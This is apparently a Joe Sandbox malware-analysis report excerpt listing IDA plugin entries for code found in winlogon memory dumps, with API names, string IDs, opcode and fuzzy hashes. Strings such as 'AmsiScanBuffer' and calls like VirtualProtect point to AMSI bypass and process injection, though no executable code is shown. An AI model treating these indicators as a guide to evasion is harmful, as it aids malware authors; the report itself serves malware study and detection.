                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction ID: 70c250347f594e71b17261cfaf8131f5a1330f05be77572a744952222a5b5b64
                                            • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction Fuzzy Hash: 6FF06273A4470941FA118B24E845BA93730FF49769FD54219AA6A451E4CF2EC44AC6CB
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction ID: 127a490b207412094bdf773d7bc7f314ed27483ed9a8622cdd057b0091c70391
                                            • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction Fuzzy Hash: C8F0BE72B44B8881FA058B13B8045A97221BF48FC8FC5D430FE0A07B28CE39D54383C6
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction ID: c75c0d1d0a7dfc333aa3dd880c92edac9d32d090e86cc0fd6d0cdfce16583c4f
                                            • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction Fuzzy Hash: 91F09673A4270981FB118B14D854B997720FF45769FD40319DA69451E8CF2EC548C383
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction ID: c82dd5a25fec972a5fbc4a73daeaf237b653ae254e79d6f593719484f7f8d2f0
                                            • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction Fuzzy Hash: 90F08276F45B9881FA058B17F9245997661BF48FC9FC88430EE4A07B58CF2DC5458783
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction ID: 2907fe888d2c04c09e7fe008df7f310d9433daeb94394008bd5d98f7c7cdab68
                                            • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction Fuzzy Hash: B4D04C36E91708A5F90B6B11D854BA73262FFD4B49FC40415890A193649E2EC55A93D3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction ID: 7246112f9244b4226b796b0cd794045831b2067abd02715776a67b51b8a182b6
                                            • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction Fuzzy Hash: 2ED0EC32E9170881F90B6B00DC54B9432217F94B18FC18018950A012649E3ED54A93DB
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction ID: 99275fefa3e122d711dffe7bf7ab3ffa9f0cd8fb82334eb92c6249ce1198314e
                                            • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction Fuzzy Hash: C1021A33659B8886E761CB15F49079AB7A0F7C4788F500015EACE97BA8DF7DC485CB82
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction ID: aa8ac499eb692d5db1208b44326d97ecb6e913e81b2b611b9ce91f482cf527ce
                                            • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction Fuzzy Hash: 5302FD33658B8486E761CB19F49079AB7B0F7C4798F504019EA8E47BA8DF7EC445CB82
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction ID: 6a2463f9efe1ef2445148160494f6b45801955cb1664d84a517ab5a6c6691788
                                            • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction Fuzzy Hash: DD51AF37B5470987F326CB16A440EAA73A1FF88B89FD140199D5A53B54DB3AC8068BD3
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction ID: f376f59fa2a11924f07aeae0f4e24fca5b39dbef64f999cd2058c410ead475d3
                                            • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction Fuzzy Hash: 04518F37B4470987F366CB15E441E9AB3A4FF88B58F908119AD5A43794DB3BD8068BC3
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: 3378145a71404300d070cab9fed9048c8f8061d59c9752aa83fb82bf50c4289a
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: 8851A133A547098AF326CF16A450EAA73A5FF88B89FD10018DD4A13754DB7AC8078BC3
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: 9e5fd35e134bb6201940a3d8bb8db161ac21b1b241632d42dbc14525f9094f05
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: 7E518233B54705CBF726CF15A440A9A73A4FF84B88F808119AE4A43754DB3AD906C7C3
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: 8dc7a5a5a748a40cbc29a5a267432368ed8bc244d7968494e66c256cbaf93485
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: 2C519333B547098BF726CF15E850E9973A0FB88B89F804159DD4A43754EB3AC945CB83
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction ID: ea16a1a7a1a17f6f263131a3a1cfce36d3cacf334bdce0e67c9e7c118ef6d97e
                                            • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction Fuzzy Hash: 70610C33A58B4886F762CB15E540B5AB7E0F789789F900115EACD53BA8DB7AC441CF82
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction ID: 613c8c001a099c7bb1652f2b5ad2a82541488477a47cebf72ef6da64e55ba237
                                            • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction Fuzzy Hash: 1B61DA33968B48C6F761CF19E440B5AB7A5F788748F904119EA8D43BA8DB7AC541CB82
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f37e1c6386c44249f93e7a8c8070b12ec0e492f56422c91e1d25021c4f6724ae
                                            • Instruction ID: fa9a5d2907fee9bc4b961baced023eb20950943a2e523218285e0907ba0ddb00
                                            • Opcode Fuzzy Hash: f37e1c6386c44249f93e7a8c8070b12ec0e492f56422c91e1d25021c4f6724ae
                                            • Instruction Fuzzy Hash: 1F61F633969B4886F761CB15E550B9AB7E0FB88749F900115FA8D43BA8DB3EC540CB83
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction ID: a3441327fd192ba05e1bd0321bbdf2938bb54ef04919ac3b85a9ec6d852f5b6a
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: 0F114F36A0874493FB258B21E40464B7770FB88B88F440026DE5D07758EB7EC94587C2
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction ID: d868ca04b8d8586f6f6a390e290e58150676275038ac38a85c7b80935c32969b
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: DE115137A0874483FB258B21E4046497771FF48B98F44402AEA4D03758EB7ED545C7CA
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: f525cb24ccabdaef705eca32e391c6c3482e6c61b1592a8eb16db6a1036eaf3a
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 2151E273B417088AFB19CB25D054FADB391FB44B8DF984110EA9A57788DB7AC842C7C2
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: a759c82f011c931f3a48cb36091e1ef5e587e1df0f78fc6b8324226c07ede887
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 6051C133B417089AEB19CB25D084FA8B391FB54B9CF918128AA5547784DB7BC842C7C3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 60e8b9d452b22d8066b229c291e107fc67761e130e05b0da0dcc3cb05f5680b7
